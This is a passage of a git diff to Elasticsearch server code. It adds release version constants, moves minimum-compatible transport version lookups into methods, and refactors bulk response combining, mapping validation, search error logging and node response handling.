INITIAL_ELASTICSEARCH_8_18_4 = def(8_840_0_06); + public static final TransportVersion INITIAL_ELASTICSEARCH_8_18_7 = def(8_840_0_09); public static final TransportVersion INITIAL_ELASTICSEARCH_8_19 = def(8_841_0_00); public static final TransportVersion COHERE_BIT_EMBEDDING_TYPE_SUPPORT_ADDED_BACKPORT_8_X = def(8_841_0_01); public static final TransportVersion REMOVE_ALL_APPLICABLE_SELECTOR_BACKPORT_8_19 = def(8_841_0_02); @@ -209,11 +209,18 @@ static TransportVersion def(int id) { public static final TransportVersion ML_INFERENCE_ELASTIC_DENSE_TEXT_EMBEDDINGS_ADDED_8_19 = def(8_841_0_59); public static final TransportVersion ML_INFERENCE_COHERE_API_VERSION_8_19 = def(8_841_0_60); public static final TransportVersion ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED_8_19 = def(8_841_0_61); + public static final TransportVersion ESQL_PROFILE_INCLUDE_PLAN_8_19 = def(8_841_0_62); + public static final TransportVersion ESQL_SPLIT_ON_BIG_VALUES_8_19 = def(8_841_0_63); + public static final TransportVersion ESQL_FIXED_INDEX_LIKE_8_19 = def(8_841_0_64); + public static final TransportVersion INITIAL_ELASTICSEARCH_8_19_1 = def(8_841_0_65); + public static final TransportVersion INITIAL_ELASTICSEARCH_8_19_2 = def(8_841_0_66); + public static final TransportVersion INITIAL_ELASTICSEARCH_8_19_4 = def(8_841_0_68); public static final TransportVersion V_9_0_0 = def(9_000_0_09); public static final TransportVersion INITIAL_ELASTICSEARCH_9_0_1 = def(9_000_0_10); public static final TransportVersion INITIAL_ELASTICSEARCH_9_0_2 = def(9_000_0_11); public static final TransportVersion INITIAL_ELASTICSEARCH_9_0_3 = def(9_000_0_12); public static final TransportVersion INITIAL_ELASTICSEARCH_9_0_4 = def(9_000_0_13); + public static final TransportVersion INITIAL_ELASTICSEARCH_9_0_7 = def(9_000_0_16); public static final TransportVersion COHERE_BIT_EMBEDDING_TYPE_SUPPORT_ADDED = def(9_001_0_00); public static final TransportVersion REMOVE_SNAPSHOT_FAILURES = def(9_002_0_00); public static final TransportVersion TRANSPORT_STATS_HANDLING_TIME_REQUIRED = def(9_003_0_00); @@ -325,6 +332,12 @@ static TransportVersion def(int id) { public static final TransportVersion ML_INFERENCE_COHERE_API_VERSION = def(9_110_0_00); public static final TransportVersion ESQL_PROFILE_INCLUDE_PLAN = def(9_111_0_00); public static final TransportVersion MAPPINGS_IN_DATA_STREAMS = def(9_112_0_00); + public static final TransportVersion ESQL_SPLIT_ON_BIG_VALUES_9_1 = def(9_112_0_01); + public static final TransportVersion ESQL_FIXED_INDEX_LIKE_9_1 = def(9_112_0_02); + public static final TransportVersion ESQL_SAMPLE_OPERATOR_STATUS_9_1 = def(9_112_0_03); + public static final TransportVersion INITIAL_ELASTICSEARCH_9_1_1 = def(9_112_0_04); + public static final TransportVersion INITIAL_ELASTICSEARCH_9_1_2 = def(9_112_0_05); + public static final TransportVersion INITIAL_ELASTICSEARCH_9_1_4 = def(9_112_0_07); /* * STOP! READ THIS FIRST! No, really, @@ -381,45 +394,18 @@ static TransportVersion def(int id) { * In branches 8.7-8.10 see server/src/main/java/org/elasticsearch/TransportVersion.java for the equivalent definitions. */ - /** - * Reference to the earliest compatible transport version to this version of the codebase. - * This should be the transport version used by the highest minor version of the previous major. - */ - public static final TransportVersion MINIMUM_COMPATIBLE = INITIAL_ELASTICSEARCH_8_19; - - /** - * Reference to the minimum transport version that can be used with CCS. - * This should be the transport version used by the previous minor release. - */ - public static final TransportVersion MINIMUM_CCS_VERSION = INITIAL_ELASTICSEARCH_9_0_3; - /** * Sorted list of all versions defined in this class */ static final List DEFINED_VERSIONS = collectAllVersionIdsDefinedInClass(TransportVersions.class); - // the highest transport version constant defined - static final TransportVersion LATEST_DEFINED; - static { - LATEST_DEFINED = DEFINED_VERSIONS.getLast(); - - // see comment on IDS field - // now we're registered all the transport versions, we can clear the map - IDS = null; - } - public static List collectAllVersionIdsDefinedInClass(Class cls) { Map versionIdFields = new HashMap<>(); List definedTransportVersions = new ArrayList<>(); - Set ignore = Set.of("ZERO", "CURRENT", "MINIMUM_COMPATIBLE", "MINIMUM_CCS_VERSION"); - for (Field declaredField : cls.getFields()) { if (declaredField.getType().equals(TransportVersion.class)) { String fieldName = declaredField.getName(); - if (ignore.contains(fieldName)) { - continue; - } TransportVersion version; try { @@ -449,8 +435,6 @@ public static List collectAllVersionIdsDefinedInClass(Class return List.copyOf(definedTransportVersions); } - static final IntFunction VERSION_LOOKUP = ReleaseVersions.generateVersionsLookup(TransportVersions.class, LATEST_DEFINED.id()); - // no instance private TransportVersions() {} } diff --git a/server/src/main/java/org/elasticsearch/Version.java b/server/src/main/java/org/elasticsearch/Version.java index 925370623a888..af7bad06f564e 100644 --- a/server/src/main/java/org/elasticsearch/Version.java +++ b/server/src/main/java/org/elasticsearch/Version.java @@ -205,19 +205,34 @@ public class Version implements VersionId, ToXContentFragment { public static final Version V_8_17_7 = new Version(8_17_07_99); public static final Version V_8_17_8 = new Version(8_17_08_99); public static final Version V_8_17_9 = new Version(8_17_09_99); + public static final Version V_8_17_10 = new Version(8_17_10_99); public static final Version V_8_18_0 = new Version(8_18_00_99); public static final Version V_8_18_1 = new Version(8_18_01_99); public static final Version V_8_18_2 = new Version(8_18_02_99); public static final Version V_8_18_3 = new Version(8_18_03_99); public static final Version V_8_18_4 = new Version(8_18_04_99); + public static final Version V_8_18_5 = new Version(8_18_05_99); + public static final Version V_8_18_6 = new Version(8_18_06_99); + public static final Version V_8_18_7 = new Version(8_18_07_99); public static final Version V_8_19_0 = new Version(8_19_00_99); + public static final Version V_8_19_1 = new Version(8_19_01_99); + public static final Version V_8_19_2 = new Version(8_19_02_99); + public static final Version V_8_19_3 = new Version(8_19_03_99); + public static final Version V_8_19_4 = new Version(8_19_04_99); public static final Version V_9_0_0 = new Version(9_00_00_99); public static final Version V_9_0_1 = new Version(9_00_01_99); public static final Version V_9_0_2 = new Version(9_00_02_99); public static final Version V_9_0_3 = new Version(9_00_03_99); public static final Version V_9_0_4 = new Version(9_00_04_99); + public static final Version V_9_0_5 = new Version(9_00_05_99); + public static final Version V_9_0_6 = new Version(9_00_06_99); + public static final Version V_9_0_7 = new Version(9_00_07_99); public static final Version V_9_1_0 = new Version(9_01_00_99); - public static final Version CURRENT = V_9_1_0; + public static final Version V_9_1_1 = new Version(9_01_01_99); + public static final Version V_9_1_2 = new Version(9_01_02_99); + public static final Version V_9_1_3 = new Version(9_01_03_99); + public static final Version V_9_1_4 = new Version(9_01_04_99); + public static final Version CURRENT = V_9_1_4; private static final NavigableMap VERSION_IDS; private static final Map VERSION_STRINGS; diff --git a/server/src/main/java/org/elasticsearch/action/bulk/BulkOperation.java b/server/src/main/java/org/elasticsearch/action/bulk/BulkOperation.java index 9c5f40577b32c..a9f0146ab03d3 100644 --- a/server/src/main/java/org/elasticsearch/action/bulk/BulkOperation.java +++ b/server/src/main/java/org/elasticsearch/action/bulk/BulkOperation.java @@ -615,7 +615,6 @@ private IndexDocFailureStoreStatus processFailure(BulkItemRequest bulkItemReques * @return a data stream if the write request points to a data stream, or {@code null} if it does not */ private static DataStream getRedirectTargetCandidate(DocWriteRequest docWriteRequest, ProjectMetadata project) { - // PRTODO: We could check for cluster feature here instead // If there is no index abstraction, then the request is using a pattern of some sort, which data streams do not support IndexAbstraction ia = project.getIndicesLookup().get(docWriteRequest.index()); return DataStream.resolveDataStream(ia, project); diff --git a/server/src/main/java/org/elasticsearch/action/bulk/BulkResponse.java b/server/src/main/java/org/elasticsearch/action/bulk/BulkResponse.java index 567b433d94daf..97236b47e53aa 100644 --- a/server/src/main/java/org/elasticsearch/action/bulk/BulkResponse.java +++ b/server/src/main/java/org/elasticsearch/action/bulk/BulkResponse.java @@ -20,6 +20,7 @@ import java.io.IOException; import java.util.Iterator; +import java.util.List; /** * A response of a bulk execution. Holding a response for each item responding (in order) of the @@ -166,4 +167,32 @@ public Iterator toXContentChunked(ToXContent.Params params return builder.startArray(ITEMS); }), Iterators.forArray(responses), Iterators.single((builder, p) -> builder.endArray().endObject())); } + + /** + * Combine many bulk responses into one. + */ + public static BulkResponse combine(List responses) { + long tookInMillis = 0; + long ingestTookInMillis = NO_INGEST_TOOK; + int itemResponseCount = 0; + for (BulkResponse response : responses) { + tookInMillis += response.getTookInMillis(); + if (response.getIngestTookInMillis() != NO_INGEST_TOOK) { + if (ingestTookInMillis == NO_INGEST_TOOK) { + ingestTookInMillis = 0; + } + ingestTookInMillis += response.getIngestTookInMillis(); + } + itemResponseCount += response.getItems().length; + } + BulkItemResponse[] bulkItemResponses = new BulkItemResponse[itemResponseCount]; + int i = 0; + for (BulkResponse response : responses) { + for (BulkItemResponse itemResponse : response.getItems()) { + bulkItemResponses[i++] = itemResponse; + } + } + + return new BulkResponse(bulkItemResponses, tookInMillis, ingestTookInMillis); + } } diff --git a/server/src/main/java/org/elasticsearch/action/bulk/IncrementalBulkService.java b/server/src/main/java/org/elasticsearch/action/bulk/IncrementalBulkService.java index 81ff1925182eb..b2b4404f48d47 100644 --- a/server/src/main/java/org/elasticsearch/action/bulk/IncrementalBulkService.java +++ b/server/src/main/java/org/elasticsearch/action/bulk/IncrementalBulkService.java @@ -210,7 +210,7 @@ public void lastItems(List> items, Releasable releasable, Act @Override public void onResponse(BulkResponse bulkResponse) { handleBulkSuccess(bulkResponse); - listener.onResponse(combineResponses()); + listener.onResponse(BulkResponse.combine(responses)); } @Override @@ -252,7 +252,7 @@ private void errorResponse(ActionListener listener) { if (globalFailure) { listener.onFailure(bulkActionLevelFailure); } else { - listener.onResponse(combineResponses()); + listener.onResponse(BulkResponse.combine(responses)); } } @@ -311,25 +311,5 @@ private void createNewBulkRequest(BulkRequest.IncrementalState incrementalState) bulkRequest.setRefreshPolicy(refresh); } } - - private BulkResponse combineResponses() { - long tookInMillis = 0; - long ingestTookInMillis = 0; - int itemResponseCount = 0; - for (BulkResponse response : responses) { - tookInMillis += response.getTookInMillis(); - ingestTookInMillis += response.getIngestTookInMillis(); - itemResponseCount += response.getItems().length; - } - BulkItemResponse[] bulkItemResponses = new BulkItemResponse[itemResponseCount]; - int i = 0; - for (BulkResponse response : responses) { - for (BulkItemResponse itemResponse : response.getItems()) { - bulkItemResponses[i++] = itemResponse; - } - } - - return new BulkResponse(bulkItemResponses, tookInMillis, ingestTookInMillis); - } } } diff --git a/server/src/main/java/org/elasticsearch/action/bulk/TransportSimulateBulkAction.java b/server/src/main/java/org/elasticsearch/action/bulk/TransportSimulateBulkAction.java index ac807bf1d752c..85e9f2c5084de 100644 --- a/server/src/main/java/org/elasticsearch/action/bulk/TransportSimulateBulkAction.java +++ b/server/src/main/java/org/elasticsearch/action/bulk/TransportSimulateBulkAction.java @@ -69,6 +69,7 @@ import java.util.HashMap; import java.util.List; import java.util.Map; +import java.util.Optional; import java.util.Set; import java.util.concurrent.Executor; @@ -198,32 +199,15 @@ private Tuple, Exception> validateMappings( Collection ignoredFields = List.of(); IndexAbstraction indexAbstraction = project.getIndicesLookup().get(request.index()); try { - if (indexAbstraction != null - && componentTemplateSubstitutions.isEmpty() - && indexTemplateSubstitutions.isEmpty() - && mappingAddition.isEmpty()) { + if (indexAbstraction != null && componentTemplateSubstitutions.isEmpty() && indexTemplateSubstitutions.isEmpty()) { /* - * In this case the index exists and we don't have any component template overrides. So we can just use withTempIndexService - * to do the mapping validation, using all the existing logic for validation. + * In this case the index exists and we don't have any template overrides. So we can just merge the mappingAddition (which + * might not exist) into the existing index mapping. */ IndexMetadata imd = project.getIndexSafe(indexAbstraction.getWriteIndex(request, project)); - indicesService.withTempIndexService(imd, indexService -> { - indexService.mapperService().updateMapping(null, imd); - return IndexShard.prepareIndex( - indexService.mapperService(), - sourceToParse, - SequenceNumbers.UNASSIGNED_SEQ_NO, - -1, - -1, - VersionType.INTERNAL, - Engine.Operation.Origin.PRIMARY, - Long.MIN_VALUE, - false, - request.ifSeqNo(), - request.ifPrimaryTerm(), - 0 - ); - }); + CompressedXContent mappings = Optional.ofNullable(imd.mapping()).map(MappingMetadata::source).orElse(null); + CompressedXContent mergedMappings = mappingAddition == null ? null : mergeMappings(mappings, mappingAddition); + ignoredFields = validateUpdatedMappingsFromIndexMetadata(imd, mergedMappings, request, sourceToParse); } else { /* * The index did not exist, or we have component template substitutions, so we put together the mappings from existing @@ -296,15 +280,6 @@ private Tuple, Exception> validateMappings( ); final CompressedXContent combinedMappings = mergeMappings(new CompressedXContent(mappingsMap), mappingAddition); ignoredFields = validateUpdatedMappings(null, combinedMappings, request, sourceToParse); - } else if (indexAbstraction != null && mappingAddition.isEmpty() == false) { - /* - * The index matched no templates of any kind, including the substitutions. But it might have a mapping. So we - * merge in the mapping addition if it exists, and validate. - */ - MappingMetadata mappingFromIndex = project.index(indexAbstraction.getName()).mapping(); - CompressedXContent currentIndexCompressedXContent = mappingFromIndex == null ? null : mappingFromIndex.source(); - CompressedXContent combinedMappings = mergeMappings(currentIndexCompressedXContent, mappingAddition); - ignoredFields = validateUpdatedMappings(null, combinedMappings, request, sourceToParse); } else { /* * The index matched no templates and had no mapping of its own. If there were component template substitutions @@ -332,9 +307,6 @@ private Collection validateUpdatedMappings( IndexRequest request, SourceToParse sourceToParse ) throws IOException { - if (updatedMappings == null) { - return List.of(); // no validation to do - } Settings dummySettings = Settings.builder() .put(IndexMetadata.SETTING_VERSION_CREATED, IndexVersion.current()) .put(IndexMetadata.SETTING_NUMBER_OF_SHARDS, 1) @@ -346,8 +318,20 @@ private Collection validateUpdatedMappings( originalIndexMetadataBuilder.putMapping(new MappingMetadata(originalMappings)); } final IndexMetadata originalIndexMetadata = originalIndexMetadataBuilder.build(); + return validateUpdatedMappingsFromIndexMetadata(originalIndexMetadata, updatedMappings, request, sourceToParse); + } + + private Collection validateUpdatedMappingsFromIndexMetadata( + IndexMetadata originalIndexMetadata, + @Nullable CompressedXContent updatedMappings, + IndexRequest request, + SourceToParse sourceToParse + ) throws IOException { + if (updatedMappings == null) { + return List.of(); // no validation to do + } final IndexMetadata updatedIndexMetadata = IndexMetadata.builder(request.index()) - .settings(dummySettings) + .settings(originalIndexMetadata.getSettings()) .putMapping(new MappingMetadata(updatedMappings)) .build(); Engine.Index result = indicesService.withTempIndexService(originalIndexMetadata, indexService -> { diff --git a/server/src/main/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingService.java b/server/src/main/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingService.java index 61eb2867790a2..b5c884be746dc 100644 --- a/server/src/main/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingService.java +++ b/server/src/main/java/org/elasticsearch/action/datastreams/autosharding/DataStreamAutoShardingService.java @@ -26,6 +26,7 @@ import org.elasticsearch.core.Nullable; import org.elasticsearch.core.TimeValue; import org.elasticsearch.index.Index; +import org.elasticsearch.index.IndexMode; import org.elasticsearch.index.shard.IndexingStats; import java.util.Arrays; @@ -371,6 +372,7 @@ public String toString() { * there'll be no new auto sharding event) */ public AutoShardingResult calculate(ProjectState state, DataStream dataStream, @Nullable IndexStats writeIndexStats) { + if (isAutoShardingEnabled == false) { logger.debug("Data stream auto-sharding service is not enabled."); return NOT_APPLICABLE_RESULT; @@ -385,6 +387,11 @@ public AutoShardingResult calculate(ProjectState state, DataStream dataStream, @ return NOT_APPLICABLE_RESULT; } + if (dataStream.getIndexMode() == IndexMode.LOOKUP) { + logger.debug("Data stream [{}] has indexing mode LOOKUP; auto-sharding is not applicable.", dataStream.getName()); + return NOT_APPLICABLE_RESULT; + } + if (writeIndexStats == null) { logger.debug( "Data stream auto-sharding service cannot compute the optimal number of shards for data stream [{}] as the write index " diff --git a/server/src/main/java/org/elasticsearch/action/search/OpenPointInTimeResponse.java b/server/src/main/java/org/elasticsearch/action/search/OpenPointInTimeResponse.java index b3ffc564d848c..f8243097e80a3 100644 --- a/server/src/main/java/org/elasticsearch/action/search/OpenPointInTimeResponse.java +++ b/server/src/main/java/org/elasticsearch/action/search/OpenPointInTimeResponse.java @@ -59,7 +59,7 @@ public void writeTo(StreamOutput out) throws IOException { public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { builder.startObject(); builder.field("id", Base64.getUrlEncoder().encodeToString(BytesReference.toBytes(pointInTimeId))); - buildBroadcastShardsHeader(builder, params, totalShards, successfulShards, failedShards, skippedShards, null); + buildBroadcastShardsHeader(builder, params, totalShards, successfulShards, skippedShards, failedShards, null); builder.endObject(); return builder; } diff --git a/server/src/main/java/org/elasticsearch/action/search/SearchPhaseController.java b/server/src/main/java/org/elasticsearch/action/search/SearchPhaseController.java index 7339135fe93dc..2df4c05722908 100644 --- a/server/src/main/java/org/elasticsearch/action/search/SearchPhaseController.java +++ b/server/src/main/java/org/elasticsearch/action/search/SearchPhaseController.java @@ -9,6 +9,8 @@ package org.elasticsearch.action.search; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; import org.apache.lucene.search.FieldDoc; import org.apache.lucene.search.ScoreDoc; import org.apache.lucene.search.Sort; @@ -72,6 +74,8 @@ public final class SearchPhaseController { + private static final Logger logger = LogManager.getLogger(SearchPhaseController.class); + private final BiFunction< Supplier, AggregatorFactories.Builder, @@ -153,17 +157,22 @@ static TopDocs mergeTopDocs(List results, int topN, int from) { return topDocs; } final TopDocs mergedTopDocs; - if (topDocs instanceof TopFieldGroups firstTopDocs) { - final Sort sort = validateSameSortTypesAndMaybeRewrite(results, firstTopDocs.fields); - TopFieldGroups[] shardTopDocs = topDocsList.toArray(new TopFieldGroups[0]); - mergedTopDocs = TopFieldGroups.merge(sort, from, topN, shardTopDocs, false); - } else if (topDocs instanceof TopFieldDocs firstTopDocs) { - TopFieldDocs[] shardTopDocs = topDocsList.toArray(new TopFieldDocs[0]); - final Sort sort = validateSameSortTypesAndMaybeRewrite(results, firstTopDocs.fields); - mergedTopDocs = TopDocs.merge(sort, from, topN, shardTopDocs); - } else { - final TopDocs[] shardTopDocs = topDocsList.toArray(new TopDocs[0]); - mergedTopDocs = TopDocs.merge(from, topN, shardTopDocs); + try { + if (topDocs instanceof TopFieldGroups firstTopDocs) { + final Sort sort = validateSameSortTypesAndMaybeRewrite(results, firstTopDocs.fields); + TopFieldGroups[] shardTopDocs = topDocsList.toArray(new TopFieldGroups[0]); + mergedTopDocs = TopFieldGroups.merge(sort, from, topN, shardTopDocs, false); + } else if (topDocs instanceof TopFieldDocs firstTopDocs) { + TopFieldDocs[] shardTopDocs = topDocsList.toArray(new TopFieldDocs[0]); + final Sort sort = validateSameSortTypesAndMaybeRewrite(results, firstTopDocs.fields); + mergedTopDocs = TopDocs.merge(sort, from, topN, shardTopDocs); + } else { + final TopDocs[] shardTopDocs = topDocsList.toArray(new TopDocs[0]); + mergedTopDocs = TopDocs.merge(from, topN, shardTopDocs); + } + } catch (IllegalArgumentException e) { + logger.debug("Failed to merge top docs: ", e); + throw e; } return mergedTopDocs; } diff --git a/server/src/main/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncAction.java b/server/src/main/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncAction.java index f0be39208c902..51406d8c9ad19 100644 --- a/server/src/main/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncAction.java +++ b/server/src/main/java/org/elasticsearch/action/search/SearchQueryThenFetchAsyncAction.java @@ -177,7 +177,17 @@ && getRequest().scroll() == null } } } - bottomSortCollector.consumeTopDocs(topDocs, queryResult.sortValueFormats()); + try { + bottomSortCollector.consumeTopDocs(topDocs, queryResult.sortValueFormats()); + } catch (Exception e) { + // In case the collecting fails, e.g. because of a formatting error, we log the error and continue + logger.debug( + "failed to consume top docs for shard [{}] with sort fields [{}]: {}", + result.getShardIndex(), + Arrays.toString(topDocs.fields), + e + ); + } } super.onShardResult(result); } @@ -457,6 +467,7 @@ protected void doRun(Map shardIndexMap) { executeAsSingleRequest(routing, request.shards.getFirst()); return; } + String nodeId = routing.nodeId(); final Transport.Connection connection; try { connection = getConnection(routing.clusterAlias(), routing.nodeId()); @@ -508,6 +519,7 @@ public void handleResponse(NodeQueryResponse response) { @Override public void handleException(TransportException e) { Exception cause = (Exception) ExceptionsHelper.unwrapCause(e); + logger.debug("handling node search exception coming from [" + nodeId + "]", cause); if (e instanceof SendRequestTransportException || cause instanceof TaskCancelledException) { // two possible special cases here where we do not want to fail the phase: // failure to send out the request -> handle things the same way a shard would fail with unbatched execution @@ -550,7 +562,7 @@ private void onNodeQueryFailure(Exception e, NodeQueryRequest request, CanMatchP } } - private static final String NODE_SEARCH_ACTION_NAME = "indices:data/read/search[query][n]"; + public static final String NODE_SEARCH_ACTION_NAME = "indices:data/read/search[query][n]"; static void registerNodeSearchAction( SearchTransportService searchTransportService, @@ -708,8 +720,8 @@ private void setFailure(QueryPerNodeState state, int dataNodeLocalIdx, Exception @Override public void onFailure(Exception e) { - // TODO: count down fully and just respond with an exception if partial results aren't allowed as an - // optimization + // Note: this shard won't be retried until it returns to the coordinating node where the shard iterator lives + // TODO: consider alternatives that don't wait for the entire batch to complete before retrying the shard setFailure(state, dataNodeLocalIdx, e); doneFuture.onResponse(null); } diff --git a/server/src/main/java/org/elasticsearch/action/search/TransportSearchHelper.java b/server/src/main/java/org/elasticsearch/action/search/TransportSearchHelper.java index 4e3544f0170cb..0e9b0811015d1 100644 --- a/server/src/main/java/org/elasticsearch/action/search/TransportSearchHelper.java +++ b/server/src/main/java/org/elasticsearch/action/search/TransportSearchHelper.java @@ -10,7 +10,7 @@ package org.elasticsearch.action.search; import org.apache.lucene.util.BytesRef; -import org.elasticsearch.TransportVersions; +import org.elasticsearch.TransportVersion; import org.elasticsearch.common.bytes.BytesReference; import org.elasticsearch.common.io.stream.BytesStreamOutput; import org.elasticsearch.common.io.stream.InputStreamStreamInput; @@ -127,14 +127,14 @@ private static SearchContextIdForNode innerReadSearchContextIdForNode(String con */ public static void checkCCSVersionCompatibility(Writeable writeableRequest) { try { - writeableRequest.writeTo(new VersionCheckingStreamOutput(TransportVersions.MINIMUM_CCS_VERSION)); + writeableRequest.writeTo(new VersionCheckingStreamOutput(TransportVersion.minimumCCSVersion())); } catch (Exception e) { // if we cannot serialize, raise this as an error to indicate to the caller that CCS has problems with this request throw new IllegalArgumentException( "[" + writeableRequest.getClass() + "] is not compatible with version " - + TransportVersions.MINIMUM_CCS_VERSION.toReleaseVersion() + + TransportVersion.minimumCCSVersion().toReleaseVersion() + " and the '" + SearchService.CCS_VERSION_CHECK_SETTING.getKey() + "' setting is enabled.", diff --git a/server/src/main/java/org/elasticsearch/action/support/nodes/TransportNodesAction.java b/server/src/main/java/org/elasticsearch/action/support/nodes/TransportNodesAction.java index 96b1e1e1efca4..181d935d97f37 100644 --- a/server/src/main/java/org/elasticsearch/action/support/nodes/TransportNodesAction.java +++ b/server/src/main/java/org/elasticsearch/action/support/nodes/TransportNodesAction.java @@ -42,6 +42,7 @@ import java.util.List; import java.util.Objects; import java.util.concurrent.Executor; +import java.util.concurrent.atomic.AtomicBoolean; import static org.elasticsearch.core.Strings.format; @@ -99,6 +100,7 @@ protected void doExecute(Task task, NodesRequest request, ActionListener responses = new ArrayList<>(concreteNodes.length); final ArrayList exceptions = new ArrayList<>(0); + final AtomicBoolean responsesHandled = new AtomicBoolean(false); final TransportRequestOptions transportRequestOptions = TransportRequestOptions.timeout(request.timeout()); @@ -109,12 +111,14 @@ protected void doExecute(Task task, NodesRequest request, ActionListener { - final List drainedResponses; - synchronized (responses) { - drainedResponses = List.copyOf(responses); - responses.clear(); + if (responsesHandled.compareAndSet(false, true)) { + final List drainedResponses; + synchronized (responses) { + drainedResponses = List.copyOf(responses); + responses.clear(); + } + Releasables.wrap(Iterators.map(drainedResponses.iterator(), r -> r::decRef)).close(); } - Releasables.wrap(Iterators.map(drainedResponses.iterator(), r -> r::decRef)).close(); }); } } @@ -161,10 +165,18 @@ protected void onItemFailure(DiscoveryNode discoveryNode, Exception e) { @Override protected CheckedConsumer, Exception> onCompletion() { - // ref releases all happen-before here so no need to be synchronized return l -> { - try (var ignored = Releasables.wrap(Iterators.map(responses.iterator(), r -> r::decRef))) { - newResponseAsync(task, request, actionContext, responses, exceptions, l); + if (responsesHandled.compareAndSet(false, true)) { + // ref releases all happen-before here so no need to be synchronized + try (var ignored = Releasables.wrap(Iterators.map(responses.iterator(), r -> r::decRef))) { + newResponseAsync(task, request, actionContext, responses, exceptions, l); + } + } else { + logger.debug("task cancelled after all responses were collected"); + assert task instanceof CancellableTask : "expect CancellableTask, but got: " + task; + final var cancellableTask = (CancellableTask) task; + assert cancellableTask.isCancelled(); + cancellableTask.notifyIfCancelled(l); } }; } diff --git a/server/src/main/java/org/elasticsearch/bootstrap/Elasticsearch.java b/server/src/main/java/org/elasticsearch/bootstrap/Elasticsearch.java index 5e3c5d026f283..8b59a59dcf313 100644 --- a/server/src/main/java/org/elasticsearch/bootstrap/Elasticsearch.java +++ b/server/src/main/java/org/elasticsearch/bootstrap/Elasticsearch.java @@ -256,6 +256,7 @@ private static void initPhase2(Bootstrap bootstrap) throws IOException { scopeResolver::resolveClassToScope, nodeEnv.settings()::getValues, nodeEnv.dataDirs(), + nodeEnv.sharedDataDir(), nodeEnv.repoDirs(), nodeEnv.configDir(), nodeEnv.libDir(), @@ -267,11 +268,18 @@ private static void initPhase2(Bootstrap bootstrap) throws IOException { args.pidFile(), Set.of(EntitlementSelfTester.class.getPackage()) ); - EntitlementSelfTester.entitlementSelfTest(); + entitlementSelfTest(); bootstrap.setPluginsLoader(pluginsLoader); } + /** + * @throws IllegalStateException if entitlements aren't functioning properly. + */ + static void entitlementSelfTest() { + EntitlementSelfTester.entitlementSelfTest(); + } + private static void logSystemInfo() { final Logger logger = LogManager.getLogger(Elasticsearch.class); logger.info( diff --git a/server/src/main/java/org/elasticsearch/cluster/ClusterModule.java b/server/src/main/java/org/elasticsearch/cluster/ClusterModule.java index 5633bd8b89e1e..a54695475b504 100644 --- a/server/src/main/java/org/elasticsearch/cluster/ClusterModule.java +++ b/server/src/main/java/org/elasticsearch/cluster/ClusterModule.java @@ -380,6 +380,13 @@ public static List getNamedXWriteables() { DesiredNodesMetadata::fromXContent ) ); + entries.add( + new NamedXContentRegistry.Entry( + Metadata.ProjectCustom.class, + new ParseField(StreamsMetadata.TYPE), + StreamsMetadata::fromXContent + ) + ); return entries; } diff --git a/server/src/main/java/org/elasticsearch/cluster/ClusterState.java b/server/src/main/java/org/elasticsearch/cluster/ClusterState.java index d5356bd54b845..534272051ca8c 100644 --- a/server/src/main/java/org/elasticsearch/cluster/ClusterState.java +++ b/server/src/main/java/org/elasticsearch/cluster/ClusterState.java @@ -241,7 +241,7 @@ public ClusterState( assert assertConsistentRoutingNodes(routingTable, nodes, routingNodes); assert assertConsistentProjectState(routingTable, metadata); this.minVersions = blocks.hasGlobalBlock(STATE_NOT_RECOVERED_BLOCK) - ? new CompatibilityVersions(TransportVersions.MINIMUM_COMPATIBLE, Map.of()) // empty map because cluster state is unknown + ? new CompatibilityVersions(TransportVersion.minimumCompatible(), Map.of()) // empty map because cluster state is unknown : CompatibilityVersions.minimumVersions(compatibilityVersions.values()); assert compatibilityVersions.isEmpty() diff --git a/server/src/main/java/org/elasticsearch/cluster/RepositoryCleanupInProgress.java b/server/src/main/java/org/elasticsearch/cluster/RepositoryCleanupInProgress.java index 0e57c18248447..a1abb4647e957 100644 --- a/server/src/main/java/org/elasticsearch/cluster/RepositoryCleanupInProgress.java +++ b/server/src/main/java/org/elasticsearch/cluster/RepositoryCleanupInProgress.java @@ -9,7 +9,6 @@ package org.elasticsearch.cluster; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.metadata.ProjectId; import org.elasticsearch.common.Strings; import org.elasticsearch.common.collect.Iterators; @@ -109,7 +108,7 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public record Entry(ProjectId projectId, String repository, long repositoryStateId) implements Writeable, RepositoryOperation { diff --git a/server/src/main/java/org/elasticsearch/cluster/RestoreInProgress.java b/server/src/main/java/org/elasticsearch/cluster/RestoreInProgress.java index a084276de9112..26ad63e9172b2 100644 --- a/server/src/main/java/org/elasticsearch/cluster/RestoreInProgress.java +++ b/server/src/main/java/org/elasticsearch/cluster/RestoreInProgress.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.admin.cluster.snapshots.restore.RestoreSnapshotRequest; import org.elasticsearch.cluster.ClusterState.Custom; import org.elasticsearch.common.collect.Iterators; @@ -269,7 +268,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } public static NamedDiff readDiffFrom(StreamInput in) throws IOException { diff --git a/server/src/main/java/org/elasticsearch/cluster/SnapshotDeletionsInProgress.java b/server/src/main/java/org/elasticsearch/cluster/SnapshotDeletionsInProgress.java index 8136719612ce6..bdd5dd25daba2 100644 --- a/server/src/main/java/org/elasticsearch/cluster/SnapshotDeletionsInProgress.java +++ b/server/src/main/java/org/elasticsearch/cluster/SnapshotDeletionsInProgress.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.ClusterState.Custom; import org.elasticsearch.cluster.metadata.ProjectId; import org.elasticsearch.common.UUIDs; @@ -167,7 +166,7 @@ public static NamedDiff readDiffFrom(StreamInput in) throws IOException @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return 